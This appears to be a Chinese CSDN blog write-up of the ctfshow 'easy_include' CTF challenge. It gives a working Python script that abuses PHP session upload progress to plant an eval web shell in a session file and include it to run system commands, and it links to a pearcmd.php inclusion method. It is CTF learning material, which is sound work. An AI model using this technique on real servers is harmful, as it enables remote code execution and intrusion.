ctfshow元旦,easy_include

最新推荐文章于 2024-07-03 23:19:22 发布
最新推荐文章于 2024-07-03 23:19:22 发布
阅读量1.1k 收藏 12
点赞数 6
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62306641/article/details/135431426
版权

比赛的时候没做出来,试了伪协议没想到文件包含。

赛后看完wp才明白。

目前,有两种方法,一个是session文件包含。

使用session文件包含:

import requests

url="http://6c53073e-b08b-4a3a-894b-20bf943d8d5f.challenge.ctf.show/"

data = {
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[2]);?>',
    '1': 'localhost/tmp/sess_ctfshow',
    '2': 'system("cat /f*");'
    }

file = {
    'file': 'ctfshow'
}
cookies = {
    'PHPSESSID': 'ctfshow'
}

response = requests.post(url=url,data=data,files=file,cookies=cookies)
print(response.text)

参看这几位师傅

session文件包含漏洞详解-CSDN博客

CTFshow元旦水友赛官方WP (qq.com)

PHP_SESSION_UPLOAD_PROGRESS,是写入临时文件的内容。
localhost/tmp/sess_ctfshow,是要包含的文件路径。
'PHPSESSID': 'ctfshow',Php会创建一个sess_ctfshow的临时文件,内容就是PHP_SESSION_UPLOAD_PROGRESS。
file://协议包含,localhost/tmp/sess_ctfshow。

设置PHP_SESSION_UPLOAD_PROGRESS,Php会创建一个临时文件在默认目录下面,localhost/tmp/,PHP_SESSION_UPLOAD_PROGRESS将他的值写入到临时文件中。

我们包含它就可以了。

方法2:pearcmd.php文件包含妙用

写贴几个链接:

pearcmd.php文件包含妙用_pearcmd文件包含-CSDN博客

Docker PHP裸文件本地包含综述 | 离别歌 (leavesongs.com)

[ctfshow 2023元旦水友赛]web题解-CSDN博客

P神讲的很清楚。这里就不过多赘述了。

藤井树441
关注
  • 6
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ProxyExpress_2012元旦
01-05
ProxyExpress_2012元旦
[CMS程序]搜客CMS网站内容管理系统 v1.3 2006元旦版_scms.zip
03-19
【CMS程序】搜客CMS网站内容管理系统 v1.3 2006元旦版_scms.zip CMS(Content Management System,内容管理系统)是用于构建、管理和维护网站的强大工具,它为非技术人员提供了一种便捷的方式来更新网站内容。搜客...
ctfshow2024元旦杯web
NYG694的博客
01-04 1907
2024ctfshow水友元旦杯web方向题解---更新中
【Web】CTFSHOW元旦水友赛部分wp
uuzeray的博客
01-02 3895
web一共5题,我出了3题,巧的是好像师傅们也只出了3题,跨年拿旗还是很快乐的,下面直接贴出自己的wp.
CTFshow元旦水友赛-web-easy include
jwkaaaaaa的博客
05-22 422
CTF元旦水友赛-web-easy include wp
CTFshow元旦水友赛easy_include
qq_48932191的博客
01-20 1180
'1': 'localhost/tmp/sess_ctfshow',#php session以文件形式存储的默认路径,session文件默认命名方式是sess_'PHP_SESSION_UPLOAD_PROGRESS': '
CTFshow web入门——文件包含
小元砸的博客
02-07 3409
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
CTFshow元旦水友赛web部分题解
qq_34942239的博客
01-27 1796
Chu0_write:被创建时候,chu0被赋值为xiuxiuxiu,当Chu0_write被当作字符串使用时,如果chu0和chu1相等,content则为ctfshowshowshowww和get传参的chu0拼接后字符,如果name中的“base64”个数为1或者有其他方法,将content写入name.txt,其中name用get上传。get传参show_show.show,先后进行waf1 和waf2如果绕过正则,进行反序列化。可以看到能读取到文件,读取一些配置文件无果,尝试用pear文件包含。
ctfshow文件包含
Vincent0sen的博客
11-13 1175
解法一 - php://input解法二 - data://
初中语文文摘文苑那年元旦__惊天地泣鬼神
09-09
初中语文文摘文苑那年元旦__惊天地泣鬼神
vb37_VB写的公司元旦抽奖系统_
09-29
【VB37_VB写的公司元旦抽奖系统】是一款基于Visual Basic(VB)开发的用于公司庆祝活动的抽奖软件。这个系统由东莞市弘安纸品包装有限公司设计,旨在为公司的元旦庆祝活动提供一个互动且趣味盎然的抽奖环节。源代码...
ctfshow愚人杯web复现
qq_63928796的博客
04-05 3379
获取到 3 个节点的公钥,可以自己进行加密 通过该网站的公钥 1 和自己的私钥 1 进行加解密,发现可行,说明该网站就是用户 A 想到如果对自己 IP 进行加密,然后替换“解密后的数据“中的用户 B 的 IP,那么最终明文 将发送给自己。其中move是移动的意思,猜测这是一个移位的加密,其中猜测key是范围那么就有向左就有3种可能, 向右也有3种可能 但是提示2提示我们random-随机,那么加密可能是2~7随机,那么每次正好相等就是1/24的几率。都是可控的,所以可以利用php原生类来读取文件。
ctfshow 常用姿势
qq_53063436的博客
11-02 902
ctfshow 常用姿态
CTFSHOW-文件包含
m0_74606212的博客
03-24 388
CTFSHOW-文件包含
CTFSHOW web入门 web100 wp
wei_xiao_zan的博客
05-22 1303
终于做到100题了!!! 咱就是说先看代码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-21 22:10:28 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.p
【Web】CTFSHOW 常用姿势刷题记录(全)
uuzeray的博客
02-25 1725
通过将常用的函数、类和数据打包成.so 文件,不同的程序可以共享这些代码,避免重复编写和维护相同的代码逻辑,提高了代码的重用性。
ctfshow-命令执行
YkingH的博客
01-28 3853
命令执行 命令执行常见做题姿势 *或?代替文件名全拼 用其它的命令执行函数代替被过滤的函数 用已知参数传入另一个无限制参数,构造木马 编码绕过 include 不用括号 分号可用?>代替 cat替换 内部字段分隔符$IFS grep 通配符匹配 无字母数字的webshell $(( ))与整数运算 脚本 复制重命名绕过 fopen 路径读取 文件高亮 文件包含 exit() mysql load_file读取文件 命令接口 等等 web29 error_reporting(0); if
Android 系统网络、时间服务器配置修改
最新发布
ange_li的博客
07-03 236
刷机国外android rom 修改配置的常用命令
ctfshow元旦水友赛wp
04-13
很抱歉,我无法提供关于ctfshow元旦水友赛wp的具体介绍,因为我无法获取实时的比赛信息。但是,我可以告诉你一些关于CTF比赛的基本知识和常见的解题思路。 CTF(Capture The Flag)比赛是一种网络安全竞赛,旨在考察参赛者在网络安全领域的技能和知识。比赛通常包括密码学、逆向工程、Web安全、二进制漏洞利用等多个领域的题目。 在CTF比赛中,参赛者需要通过解决一系列的题目来获取旗帜(Flag),并提交给比赛平台进行得分。每个题目都有不同的解题思路和技巧,有些可能需要进行逆向分析、漏洞利用,有些可能需要进行密码学算法破解或者Web应用漏洞挖掘。 解题过程中,参赛者通常需要具备良好的编程和网络安全知识,能够熟练运用各种工具和技术进行分析和攻击。此外,团队合作和快速学习能力也是取得好成绩的重要因素。 如果你对CTF比赛感兴趣,可以参加一些线上或线下的CTF比赛,通过实践来提升自己的技能。同时,也可以学习相关的网络安全知识和技术,例如密码学、漏洞利用、网络协议等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值